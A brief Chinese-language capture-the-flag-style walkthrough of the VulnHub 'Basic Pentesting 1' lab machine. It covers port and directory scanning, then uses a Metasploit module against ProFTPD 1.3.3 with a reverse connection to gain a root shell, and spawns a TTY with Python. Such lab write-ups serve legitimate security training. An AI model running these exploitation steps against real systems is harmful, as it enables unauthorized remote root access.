靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/#download
信息收集
扫描靶机的 ip 地址
arp-scan -l
kali:192.168.85.128
靶机:192.168.85.169
扫描靶机端口
nmap -p- -A 192.168.85.169
看到开放了 21,22,80 端口
先访问 80 端口
没看到什么有用的信息,开始扫描靶机的目录信息
dirsearch -u http://192.168.85.169
没扫到有用的信息
漏洞利用+提权
前面有一个 21 ftp 端口,版本为 proftpd 1.3.3
使用 msfconsole 找寻给版本的相关漏洞
search proftpd 1.3.3
看到 2 是符合版本的
use 2
show options
查看一下需要修改的参数
修改 rhosts 为靶机的 ip
设置反向连接
再用 show options 查看一下需要修改的参数
设置 lhosts 为攻击机的 ip(kali ip)
还有监听的端口(可以不改)
所有的都设置好后,运行
run
获取交互式 shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
发现是 root 用户